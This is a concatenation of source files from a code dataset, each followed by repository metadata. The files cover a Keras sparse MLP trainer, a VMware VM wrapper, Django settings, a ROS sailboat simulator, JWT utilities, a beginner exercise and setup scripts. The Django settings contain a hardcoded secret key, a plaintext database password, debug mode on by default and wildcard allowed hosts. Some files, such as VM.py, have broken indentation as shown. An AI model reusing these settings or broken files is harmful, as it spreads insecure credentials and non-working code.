#author = "D.C. Mocanu",
#year = "2017",
#isbn = "978-90-386-4305-2",
#publisher = "Eindhoven University of Technology",
#}
from __future__ import division
from __future__ import print_function
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras import optimizers
import numpy as np
from keras import backend as K
from keras_contrib.layers.advanced_activations import SReLU
from keras.datasets import cifar10
from keras.utils import np_utils
class Constraint(object):
    """Base class for Keras-style weight constraints.

    The default behaviour is the identity constraint: weights pass through
    unchanged and there is no configuration to serialise.
    """

    def __call__(self, w):
        # Identity; subclasses override this to transform the weights.
        return w

    def get_config(self):
        # No parameters for the base constraint.
        return {}
class MaskWeights(Constraint):
    """Weight constraint that zeroes out connections wherever the binary
    mask is zero, enforcing the sparse topology after every update."""

    def __init__(self, mask):
        # Cast once to the backend float type so the elementwise product
        # below does not re-cast on every constraint application.
        self.mask = K.cast(mask, K.floatx())

    def __call__(self, w):
        w *= self.mask
        return w

    def get_config(self):
        return {'mask': self.mask}
def find_first_pos(array, value):
    """Return the index of the first element of *array* closest to *value*."""
    return np.abs(array - value).argmin()
def find_last_pos(array, value):
    """Return one past the index of the last element of *array* closest to
    *value* (i.e. the position counted from the right, as the SET rewiring
    code expects)."""
    reversed_idx = np.abs(array[::-1] - value).argmin()
    return array.shape[0] - reversed_idx
def createWeightsMask(epsilon, noRows, noCols):
    """Generate an Erdos-Renyi sparse binary mask of shape (noRows, noCols).

    Each connection survives with probability epsilon*(noRows+noCols)/(noRows*noCols),
    so the expected number of active weights scales with epsilon.
    Returns [noParameters, mask] where noParameters is the number of ones.
    """
    keep_threshold = 1 - (epsilon * (noRows + noCols)) / (noRows * noCols)
    random_field = np.random.rand(noRows, noCols)
    # Entries at or above the threshold become 1, the rest 0.
    mask_weights = (random_field >= keep_threshold).astype(np.float64)
    noParameters = np.sum(mask_weights)
    print ("Create Sparse Matrix: No parameters, NoRows, NoCols ",noParameters,noRows,noCols)
    return [noParameters, mask_weights]
class SET_MLP_CIFAR10:
    """Sparse Evolutionary Training (SET) of a 3-hidden-layer MLP on CIFAR10.

    Sparsity is imposed through Erdos-Renyi-initialised binary masks applied
    as Keras weight constraints; after every epoch the weights closest to
    zero are pruned and replaced by new random connections (the SET step).
    NOTE: constructing an instance immediately builds the model AND starts
    the full training loop (see __init__).
    """
    def __init__(self):
        # set model parameters
        self.epsilon = 20 # control the sparsity level as discussed in the paper
        self.zeta = 0.3 # the fraction of the weights removed
        self.batch_size = 100 # batch size
        self.maxepoches = 1000 # number of epochs
        self.learning_rate = 0.01 # SGD learning rate
        self.num_classes = 10 # number of classes
        self.momentum=0.9 # SGD momentum
        # generate an Erdos Renyi sparse weights mask for each layer
        [self.noPar1, self.wm1] = createWeightsMask(self.epsilon,32 * 32 *3, 4000)
        [self.noPar2, self.wm2] = createWeightsMask(self.epsilon,4000, 1000)
        [self.noPar3, self.wm3] = createWeightsMask(self.epsilon,1000, 4000)
        # initialize layers weights
        self.w1 = None
        self.w2 = None
        self.w3 = None
        self.w4 = None
        # initialize weights for SReLu activation function
        self.wSRelu1 = None
        self.wSRelu2 = None
        self.wSRelu3 = None
        # create a SET-MLP model
        self.create_model()
        # train the SET-MLP model
        self.train()
    def create_model(self):
        """(Re)build the Keras model; None weights mean fresh initialisation,
        otherwise the weights saved by weightsEvolution() are restored."""
        # create a SET-MLP model for CIFAR10 with 3 hidden layers
        self.model = Sequential()
        self.model.add(Flatten(input_shape=(32, 32, 3)))
        self.model.add(Dense(4000, name="sparse_1",kernel_constraint=MaskWeights(self.wm1),weights=self.w1))
        self.model.add(SReLU(name="srelu1",weights=self.wSRelu1))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(1000, name="sparse_2",kernel_constraint=MaskWeights(self.wm2),weights=self.w2))
        self.model.add(SReLU(name="srelu2",weights=self.wSRelu2))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(4000, name="sparse_3",kernel_constraint=MaskWeights(self.wm3),weights=self.w3))
        self.model.add(SReLU(name="srelu3",weights=self.wSRelu3))
        self.model.add(Dropout(0.3))
        self.model.add(Dense(self.num_classes, name="dense_4",weights=self.w4)) #please note that there is no need for a sparse output layer as the number of classes is much smaller than the number of input hidden neurons
        self.model.add(Activation('softmax'))
    def rewireMask(self,weights, noWeights):
        """SET rewiring for one layer: drop the zeta fraction of weights
        closest to zero, then add the same number of random connections.
        Returns [new mask, mask of the kept (surviving) weights]."""
        # rewire weight matrix
        # remove zeta largest negative and smallest positive weights
        values = np.sort(weights.ravel())
        firstZeroPos = find_first_pos(values, 0)
        lastZeroPos = find_last_pos(values, 0)
        largestNegative = values[int((1-self.zeta) * firstZeroPos)]
        smallestPositive = values[int(min(values.shape[0] - 1, lastZeroPos +self.zeta * (values.shape[0] - lastZeroPos)))]
        rewiredWeights = weights.copy();
        rewiredWeights[rewiredWeights > smallestPositive] = 1;
        rewiredWeights[rewiredWeights < largestNegative] = 1;
        rewiredWeights[rewiredWeights != 1] = 0;
        weightMaskCore = rewiredWeights.copy()
        # add zeta random weights
        nrAdd = 0
        noRewires = noWeights - np.sum(rewiredWeights)
        while (nrAdd < noRewires):
            i = np.random.randint(0, rewiredWeights.shape[0])
            j = np.random.randint(0, rewiredWeights.shape[1])
            if (rewiredWeights[i, j] == 0):
                rewiredWeights[i, j] = 1
                nrAdd += 1
        return [rewiredWeights, weightMaskCore]
    def weightsEvolution(self):
        """Snapshot all layer weights, rewire the three sparse masks and
        zero out the values of pruned connections (the *Core masks keep
        only surviving weights; new connections start at zero)."""
        # this represents the core of the SET procedure. It removes the weights closest to zero in each layer and add new random weights
        self.w1 = self.model.get_layer("sparse_1").get_weights()
        self.w2 = self.model.get_layer("sparse_2").get_weights()
        self.w3 = self.model.get_layer("sparse_3").get_weights()
        self.w4 = self.model.get_layer("dense_4").get_weights()
        self.wSRelu1 = self.model.get_layer("srelu1").get_weights()
        self.wSRelu2 = self.model.get_layer("srelu2").get_weights()
        self.wSRelu3 = self.model.get_layer("srelu3").get_weights()
        [self.wm1, self.wm1Core] = self.rewireMask(self.w1[0], self.noPar1)
        [self.wm2, self.wm2Core] = self.rewireMask(self.w2[0], self.noPar2)
        [self.wm3, self.wm3Core] = self.rewireMask(self.w3[0], self.noPar3)
        self.w1[0] = self.w1[0] * self.wm1Core
        self.w2[0] = self.w2[0] * self.wm2Core
        self.w3[0] = self.w3[0] * self.wm3Core
    def train(self):
        """Train for maxepoches epochs, one fit_generator call per epoch,
        rebuilding the model after each epoch with the evolved masks.
        Validation accuracy per epoch is collected in accuracies_per_epoch."""
        # read CIFAR10 data
        [x_train,x_test,y_train,y_test]=self.read_data()
        #data augmentation
        datagen = ImageDataGenerator(
            featurewise_center=False,  # set input mean to 0 over the dataset
            samplewise_center=False,  # set each sample mean to 0
            featurewise_std_normalization=False,  # divide inputs by std of the dataset
            samplewise_std_normalization=False,  # divide each input by its std
            zca_whitening=False,  # apply ZCA whitening
            rotation_range=10,  # randomly rotate images in the range (degrees, 0 to 180)
            width_shift_range=0.1,  # randomly shift images horizontally (fraction of total width)
            height_shift_range=0.1,  # randomly shift images vertically (fraction of total height)
            horizontal_flip=True,  # randomly flip images
            vertical_flip=False)  # randomly flip images
        datagen.fit(x_train)
        self.model.summary()
        # training process in a for loop
        self.accuracies_per_epoch=[]
        for epoch in range(0,self.maxepoches):
            sgd = optimizers.SGD(lr=self.learning_rate, momentum=self.momentum)
            self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
            # epochs=epoch with initial_epoch=epoch-1 runs exactly one epoch
            # per call, so the SET rewiring below happens after every epoch.
            historytemp = self.model.fit_generator(datagen.flow(x_train, y_train,
                                                                batch_size=self.batch_size),
                                                   steps_per_epoch=x_train.shape[0]//self.batch_size,
                                                   epochs=epoch,
                                                   validation_data=(x_test, y_test),
                                                   initial_epoch=epoch-1)
            self.accuracies_per_epoch.append(historytemp.history['val_acc'][0])
            #ugly hack to avoid tensorflow memory increase for multiple fit_generator calls. Theano shall work more nicely this but it is outdated in general
            self.weightsEvolution()
            K.clear_session()
            self.create_model()
        self.accuracies_per_epoch=np.asarray(self.accuracies_per_epoch)
    def read_data(self):
        """Load CIFAR10, one-hot encode the labels and standardise the
        images with the training-set mean/std (applied to the test set too)."""
        #read CIFAR10 data
        (x_train, y_train), (x_test, y_test) = cifar10.load_data()
        y_train = np_utils.to_categorical(y_train, self.num_classes)
        y_test = np_utils.to_categorical(y_test, self.num_classes)
        x_train = x_train.astype('float32')
        x_test = x_test.astype('float32')
        #normalize data
        xTrainMean = np.mean(x_train, axis=0)
        xTtrainStd = np.std(x_train, axis=0)
        x_train = (x_train - xTrainMean) / xTtrainStd
        x_test = (x_test - xTrainMean) / xTtrainStd
        return [x_train, x_test, y_train, y_test]
if __name__ == '__main__':
    # create and run a SET-MLP model on CIFAR10
    # (instantiation triggers the full training loop of maxepoches epochs)
    model=SET_MLP_CIFAR10()
    # save accuracies over for all training epochs
    # in "results" folder you can find the output of running this file
    np.savetxt("results/set_mlp_srelu_sgd_cifar10_acc.txt", np.asarray(model.accuracies_per_epoch))
| [
"[email protected]"
]
| |
38c685e5b3daa3c48549492e8305d7c6ec9b4a63 | 12b41c3bddc48a6df5e55bd16f7b2792ed6e4848 | /k8_vmware/vsphere/VM.py | 7d14aa69fb7f78566e20968c659a9f980499f6e4 | [
"Apache-2.0"
]
| permissive | NourEddineX/k8-vmware | b128b03b988f8a94d6029458c5415cdd68e12b0a | 80f2a6d56021a1298919487c8372a88aff3f1fb9 | refs/heads/main | 2023-01-23T22:59:41.767216 | 2020-12-11T12:33:11 | 2020-12-11T12:33:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,321 | py | import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
def __init__(self, vm):
self.vm = vm
def config(self):
return self.summary().config
def controller_scsi(self):
controllers = self.devices_SCSI_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide(self):
controllers = self.devices_IDE_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide_free_slot(self):
controllers = self.devices_IDE_Controllers()
for controller in controllers:
if len(controller.device) < 2:
return controller
def devices(self):
return self.vm.config.hardware.device
def devices_IDE_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
def devices_Cdroms (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom )
def devices_Disks (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk )
def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController )
def devices_PCNet_32s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32 )
def devices_Vmxnet_2s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2 )
def devices_Vmxnet_3s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3 )
def devices_E1000s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000 )
def devices_E1000es (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e )
def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController )
def devices_Sriov_EthernetCards (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard )
def devices_of_type(self, type):
devices = []
for device in self.devices():
if isinstance(device, type):
devices.append(device)
return devices
def devices_indexed_by_label(self):
devices = {}
for device in self.devices():
key = device.deviceInfo.label
value = device
devices[key] = value
return devices
def guest(self):
return self.summary().guest
def info(self):
    """Collect commonly used VM properties into a flat dict.

    ``self.summary()`` is called once and its sub-objects reused, since
    every attribute access on ``self.vm.summary`` triggers another REST
    call to the server.
    """
    summary = self.summary()
    config = summary.config       # these values are retrieved on the initial call to self.vm.summary
    guest = summary.guest         # using self.vm.summary.guest here would have caused two more REST calls
    runtime = summary.runtime
    info = {
        "Annotation"      : config.annotation,
        "BootTime"        : str(runtime.bootTime),
        "ConnectionState" : runtime.connectionState,
        "GuestId"         : config.guestId,
        "GuestFullName"   : config.guestFullName,
        "Host"            : runtime.host,
        "HostName"        : guest.hostName,
        "IP"              : guest.ipAddress,
        "MemorySizeMB"    : config.memorySizeMB,
        "MOID"            : self.vm._moId,
        "Name"            : config.name,
        "MaxCpuUsage"     : runtime.maxCpuUsage,
        "MaxMemoryUsage"  : runtime.maxMemoryUsage,
        "NumCpu"          : config.numCpu,
        "PathName"        : config.vmPathName,
        "StateState"      : runtime.powerState,   # key kept as-is (likely a typo) for backward compatibility
        "Question"        : None,
        "UUID"            : config.uuid,
    }
    # Bug fix: the original line ended with a stray comma, which stored a
    # 1-tuple ('text',) instead of the plain question string.
    if runtime.question is not None:
        info['Question'] = runtime.question.text
    return info
def hardware(self):
    """Virtual hardware description of the VM."""
    return self.vm.config.hardware

def host_name(self):
    """Guest OS host name from the guest summary."""
    return self.guest().hostName

def ip(self):
    """Guest IP address from the guest summary."""
    return self.guest().ipAddress

def name(self):
    """Display name of the VM (from the config summary)."""
    return self.config().name

def moid(self):
    """Managed-object id of the underlying pyVmomi VM."""
    return self.vm._moId

def powered_state(self):
    """Raw power-state string, e.g. 'poweredOn' / 'poweredOff'."""
    return self.runtime().powerState

def power_on(self):
    """Power the VM on via a vSphere task (see VM_Task)."""
    return self.task().power_on()

def power_off(self):
    """Power the VM off via a vSphere task (see VM_Task)."""
    return self.task().power_off()

def powered_on(self):
    """True when the power state is exactly 'poweredOn'."""
    return self.powered_state() == 'poweredOn'

def powered_off(self):
    """True when the power state is exactly 'poweredOff'."""
    return self.powered_state() == 'poweredOff'
def screenshot(self, target_file=None):
    """Capture a console screenshot of this VM.

    Returns whatever ``VM_Screenshot.download()`` returns — presumably a
    file path; confirm against that class.
    """
    # Local import — presumably to avoid a circular dependency, as with
    # VM_Task below.
    from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
    return VM_Screenshot(self, target_file=target_file).download()
def send_text(self, text):
    """Type *text* into the VM console via VM_Keystroke; returns self."""
    VM_Keystroke(self).send_text(text)
    return self
def send_key(self, text):
    """Send a single key press to the VM console; returns self for chaining.

    The VM_Keystroke return value was previously captured into an unused
    local; it is now discarded, matching the sibling send_text().
    """
    VM_Keystroke(self).send_key(text)
    return self
def send_enter(self):
    """Press Enter in the VM console; returns self for chaining."""
    VM_Keystroke(self).enter()
    return self
def summary(self):
    """Fetch the VM summary object (each access is a server round-trip)."""
    return self.vm.summary # will make REST call to RetrievePropertiesEx

def task(self):
    """Return a VM_Task helper bound to this VM."""
    from k8_vmware.vsphere.VM_Task import VM_Task # have to do this import here due to circular dependencies (i.e. VM_Task imports VM)
    return VM_Task(self)

def runtime(self):
    """Runtime part of the summary (power state, host, ...)."""
    return self.vm.summary.runtime

def uuid(self):
    """UUID from the VM config summary."""
    return self.config().uuid

def wait(self, seconds): # to help with fluent code
    # Delegates to a module-level wait() helper imported elsewhere in
    # this file (not visible in this chunk), then returns self so calls
    # can be chained.
    wait(seconds)
    return self
def __str__(self):
    """Human-readable identifier, e.g. "[VM] my-vm"."""
    return f'[VM] {self.name()}'
| [
"[email protected]"
]
| |
0584747d8f65280307db8e8f7a973bf9d702eb19 | 39f1ae1e3b95d717f6d103b3ac534b468090c36f | /py_blackbox_backend/py_blackbox_backend/settings.py | 52046da510da0ace923632f0a9d29badf4aa06f4 | []
| no_license | arron1993/blackbox.arron.id | 5d532af4e9557986f8af5c9018d9d789bbd03470 | 4da60f3dd524bd0afbdc3613767a818bcab1cd8d | refs/heads/master | 2023-05-04T05:19:15.792063 | 2021-05-20T20:34:28 | 2021-05-20T20:34:28 | 346,052,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,974 | py | """
Django settings for py_blackbox_backend project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import datetime
import os
from pathlib import Path

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the fallback key below is committed to source control, so
# any deployment that does not set DJANGO_SECRET_KEY runs with a public key.
SECRET_KEY = os.environ.get(
    'DJANGO_SECRET_KEY',
    '9qyc-ncc0jq(y*4y6j4w88bffe!isuzf)1e0*sxu4w1d=k4xxo')

# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG is True unless DJANGO_DEBUG is exactly the string 'False'.
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'

# NOTE(review): '*' accepts any Host header; restrict for production.
ALLOWED_HOSTS = ['*']

# DRF authenticates requests with simplejwt bearer tokens.
REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': [
        'rest_framework_simplejwt.authentication.JWTAuthentication',
    ],
}

# Access tokens live 7 days, refresh tokens 14.
SIMPLE_JWT = {
    "ACCESS_TOKEN_LIFETIME": datetime.timedelta(days=7),
    "REFRESH_TOKEN_LIFETIME": datetime.timedelta(days=14),
}
INSTALLED_APPS = [
    # Project apps.
    'fuel.apps.FuelConfig',
    'circuit.apps.CircuitConfig',
    'car.apps.CarConfig',
    'session.apps.SessionConfig',
    'session_type.apps.SessionTypeConfig',
    'metrics.apps.MetricsConfig',
    # Django built-ins.
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Third party.
    'rest_framework',
]

# Standard Django middleware stack (order matters).
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'py_blackbox_backend.urls'

# Default Django template engine with app-level template directories.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'py_blackbox_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
if DEBUG:
    # Local development: file-based SQLite next to the project.
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': BASE_DIR / 'db.sqlite3',
        }
    }
else:
    # Production: PostgreSQL on host 'db' (docker-compose style).
    # NOTE(review): credentials are hard-coded in source; move them to
    # environment variables before deploying.
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': "live-blackbox",
            'USER': 'postgres',
            'PASSWORD': 'postgres',
            'HOST': 'db'
        }
    }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
# Django's default validator set, unchanged.
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
]
| |
b0a4fdf7a72979e444fdfa623f69a8f29cd809db | 13a179f6251d8354b058ff02b3101d904b606f0b | /src/shepherd_simu/src/sailboat_sim.py | 55da970d98847cf36e6b2ca0d542b0e025b062a6 | [
"MIT"
]
| permissive | ENSTA-Bretagne-Shepherd/Shepherd-Ros-Structure | 4bb2ecb146e9fbc0897a780980634a711dc1788b | 6ce33426911fc50dfd61f165d73efe9702c2009b | refs/heads/master | 2021-01-12T08:36:38.511501 | 2017-02-22T13:20:17 | 2017-02-22T13:20:17 | 76,635,278 | 1 | 0 | null | 2017-02-10T16:13:33 | 2016-12-16T08:16:52 | CMake | UTF-8 | Python | false | false | 1,281 | py | #!/usr/bin/env python
import rospy
from models.sailboat import Sailboat
from shepherd_reg.msg import SailboatCmd
from shepherd_disp.msg import SailboatPose
from std_msgs.msg import Float64
def update_cmd(msg):
    """ROS callback: store the latest rudder/sail command.

    Updates the module-level ``cmd`` list read by the simulation loop.
    """
    global cmd
    # print written as a function call so the script runs under both
    # Python 2 (original used a print *statement*) and Python 3.
    print('Updated cmd: {} {}'.format(msg.rudder_angle, msg.sail_angle))
    cmd = [msg.rudder_angle, msg.sail_angle]
def update_wind_direction(msg):
    """ROS callback: store the latest wind direction."""
    global wind_direction
    wind_direction = msg.data

def update_wind_force(msg):
    """ROS callback: store the latest wind force."""
    global wind_force
    wind_force = msg.data
rospy.init_node('sailboat_simu')

# Simulated boat: initial heading 0.1 rad, speed 3.
sailboat = Sailboat(theta=0.1, v=3)

# Sailboat pose publisher
pose_pub = rospy.Publisher('sailboat/pose_real', SailboatPose, queue_size=1)
# Subscribe to the command of the sailboat
sub = rospy.Subscriber('sailboat/cmd', SailboatCmd, update_cmd)
# Subscribe to the wind
rospy.Subscriber('env/wind_direction', Float64, update_wind_direction)
rospy.Subscriber('env/wind_force', Float64, update_wind_force)

# Command: [rudder_angle, sail_angle], overwritten by the cmd callback.
cmd = [0, 0]
wind_force = 3
wind_direction = 0

# Simulation loop at 10 Hz: step the model, publish the new pose.
rate = rospy.Rate(10)
while not rospy.is_shutdown():
    sailboat.simulate(cmd, wind_force, wind_direction)
    pose = SailboatPose()
    pose.pose.x = sailboat.x
    pose.pose.y = sailboat.y
    pose.pose.theta = sailboat.theta
    pose_pub.publish(pose)
    rate.sleep()
| [
"[email protected]"
]
| |
3b5faf029aed4be7d85694ac734b8aed784d187a | b156aad4624ec6dbc2efcca93181bbb948d16cc6 | /utils/utils.py | c128221bb9fdc076717f2e26e232be3b58d048cc | []
| no_license | itang85/bookshop-django | d191e2af002db94073ee8c59eeb768002443958f | b136629b4e5b1dc7f0661e4b06618f31c95d7ede | refs/heads/master | 2023-03-28T02:59:06.729909 | 2021-03-05T15:41:49 | 2021-03-05T15:41:49 | 332,227,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | import base64, json, re, jwt, datetime, time, hashlib, random
from calendar import timegm
# Google-authenticator (TOTP) module, currently unused:
# import pyotp
# Django cache module, currently unused:
# from django.core.cache import cache
from rest_framework.throttling import BaseThrottle
from django.conf import settings
from conf.area.area_list import area_dict
from utils.settings import api_settings
def jwt_payload_handler(account):
    """Build the JWT claim set for *account*.

    Always contains the account primary key ('id') and an expiry ('exp');
    'orig_iat', 'aud' and 'iss' are added when the JWT settings ask for them.
    """
    claims = {
        'id': account.pk,
        # Expiry: now plus the configured token lifetime.
        'exp': datetime.datetime.utcnow() + api_settings.JWT_EXPIRATION_DELTA,
    }
    if api_settings.JWT_ALLOW_REFRESH:
        # Original issue time (epoch seconds), used to bound refreshes.
        claims['orig_iat'] = timegm(datetime.datetime.utcnow().utctimetuple())
    for claim, value in (('aud', api_settings.JWT_AUDIENCE),
                         ('iss', api_settings.JWT_ISSUER)):
        if value is not None:
            claims[claim] = value
    return claims
def jwt_get_user_id_from_payload_handler(payload):
    """Pull the account primary key out of a decoded JWT payload.

    Returns None when the 'id' claim is absent.
    """
    try:
        return payload['id']
    except KeyError:
        return None
def jwt_encode_handler(payload):
    """Sign *payload* into a JWT using the configured key and algorithm."""
    return jwt.encode(
        payload,
        # Prefer the asymmetric private key when configured, else the shared secret.
        api_settings.JWT_PRIVATE_KEY or api_settings.JWT_SECRET_KEY,
        api_settings.JWT_ALGORITHM
    )
def jwt_decode_handler(token):
    """Verify *token* and return its decoded payload dict.

    Verification behaviour (expiry, leeway, audience, issuer) is driven
    entirely by the JWT settings; invalid tokens raise PyJWT exceptions.
    """
    options = {
        'verify_exp': api_settings.JWT_VERIFY_EXPIRATION,
    }
    return jwt.decode(
        token,
        # Public key for asymmetric algorithms, else the shared secret.
        api_settings.JWT_PUBLIC_KEY or api_settings.JWT_SECRET_KEY,
        # Restrict accepted algorithms to the configured one.
        [api_settings.JWT_ALGORITHM],
        options=options,
        verify=api_settings.JWT_VERIFY,
        leeway=api_settings.JWT_LEEWAY,
        audience=api_settings.JWT_AUDIENCE,
        issuer=api_settings.JWT_ISSUER
    )
def jwt_response_payload_handler(token, user=None, request=None):
    """Shape the login response body; only the token is exposed.

    ``user`` and ``request`` are accepted for API compatibility but unused.
    """
    return dict(token=token)
# Throttling component: naive in-process rate limiter.
# Maps client IP -> list of request timestamps, newest first.
VISIT_RECORD = {}


class VisitThrottle(BaseThrottle):
    """Allow at most 100 requests per client IP per rolling 60 seconds.

    NOTE(review): state lives in this process only and entries for idle
    IPs are never pruned, so memory grows with the number of distinct
    clients; DRF's cache-backed throttles are preferable in production.
    """

    def __init__(self):
        # Timestamp history of the current client, set by allow_request().
        self.history = None

    def allow_request(self, request, view):
        """Return True when this request is within the rate limit."""
        remote_addr = request.META.get('HTTP_X_REAL_IP')
        ctime = time.time()
        if remote_addr not in VISIT_RECORD:
            VISIT_RECORD[remote_addr] = [ctime]
            return True
        history = VISIT_RECORD.get(remote_addr)
        self.history = history
        # Drop timestamps older than the 60-second window (oldest last).
        while history and history[-1] < ctime - 60:
            history.pop()
        # Bug fix: removed the debug print(VISIT_RECORD), which dumped
        # every client's request history to stdout on each request.
        if len(history) < 100:  # limit: 100 requests per IP per minute
            history.insert(0, ctime)
            return True
        else:
            return False

    def wait(self):
        """Seconds the client must wait before the next allowed request."""
        ctime = time.time()
        return 60 - (ctime - self.history[-1])
def get_region_cn(code):
    """Resolve a 6-digit administrative area code to 'province-city-county'.

    Province is looked up from the first two digits, city from the first
    four, county from the full code, all via the area_dict tables.
    """
    parts = [
        area_dict['province_list'][code[:2] + '0000'],
        area_dict['city_list'][code[:4] + '00'],
        area_dict['county_list'][code],
    ]
    return '-'.join(parts)
| [
"[email protected]"
]
| |
55058d7c8d58c89e603d4127debeb4b8df5bd25a | 70730512e2643833e546e68761ee6cd3d7b95e1d | /01-python基础/code/day03/day02_exercise/exercise03.py | fadfaaf9e18f4ab6a6bc3a1b8aadc81dd9936e0a | []
| no_license | Yuchen1995-0315/review | 7f0b0403aea2da62566642c6797a98a0485811d1 | 502859fe11686cc59d2a6d5cc77193469997fe6a | refs/heads/master | 2020-08-26T23:16:33.193952 | 2019-10-24T00:30:32 | 2019-10-24T00:30:32 | 217,177,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | """
"""
(Extended) Read a total number of seconds from the console and report it
as hours, minutes and seconds.
"""
total_second = int(input("请输入总秒数:"))
# divmod yields quotient and remainder in one step: 3600 s/hour, 60 s/min.
hour, remainder = divmod(total_second, 3600)
minute, second = divmod(remainder, 60)
# Ways to interpolate a variable into a string:
# "...x..."  /  "..." + str(var) + "..."
print(str(hour) + "小时零" + str(minute) + "分钟零" + str(second) + "秒钟")
| [
"[email protected]"
]
| |
4fe27b358e04b2dd76cba83b1b138fdd6e369026 | 29fd3daff8c31764c00777e67d2cc9b3e94ba761 | /examples/ch05_examples/mandelbrot/mandelbrot/cython_pure_python/setup.py | 440f9ca05742dda490c59ab9d203bd5d6f221906 | []
| no_license | mwoinoski/crs1906 | 06a70a91fc99e2d80e2ed3cea5724afa22dce97d | 202f7cc4cae684461f1ec2c2c497ef20211b3e5e | refs/heads/master | 2023-06-23T17:13:08.163430 | 2023-06-12T21:44:39 | 2023-06-12T21:44:39 | 39,789,380 | 1 | 2 | null | 2022-01-26T20:43:18 | 2015-07-27T17:54:56 | Python | UTF-8 | Python | false | false | 424 | py | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# for notes on compiler flags e.g. using
# export CFLAGS=-O2
# so gcc has -O2 passed (even though it doesn't make the code faster!)
# http://docs.python.org/install/index.html
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("calculate_z", ["calculate_z.pyx"])]
)
| [
"[email protected]"
]
| |
951e54a1ed72d5527bcb0dd1b534c6ef1079a65b | 2cc84af3d2a146b4dbb04bed3cfd542fa0622489 | /image-tools/image_clustering/tile_clustering.py | 1047091f0afa7d8cb8376a27b8df124a3fda22b4 | [
"MIT"
]
| permissive | flegac/deep-experiments | e6a05b1a58eadf4c39580e95bb56d311e3dfa0ac | e1b12e724f2c8340cbe9c51396cf3f42e3b4e934 | refs/heads/master | 2020-04-09T00:20:15.132255 | 2019-10-11T16:39:47 | 2019-10-11T16:39:47 | 159,862,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,458 | py | import glob
import os
from typing import List, Callable
import cv2
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.colors import to_rgb
from scipy.stats import wasserstein_distance
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.pipeline import Pipeline
from image_clustering.tiler import GridTiler
from mydeep_api.tensor import Tensor
TagComputer = Callable[[Tensor], int]
HistComputer = Callable[[Tensor], Tensor]
class Params(object):
def __init__(self, bins: int = 64, pca_components: int = 64, tile_size: int = 64):
self.bins = bins
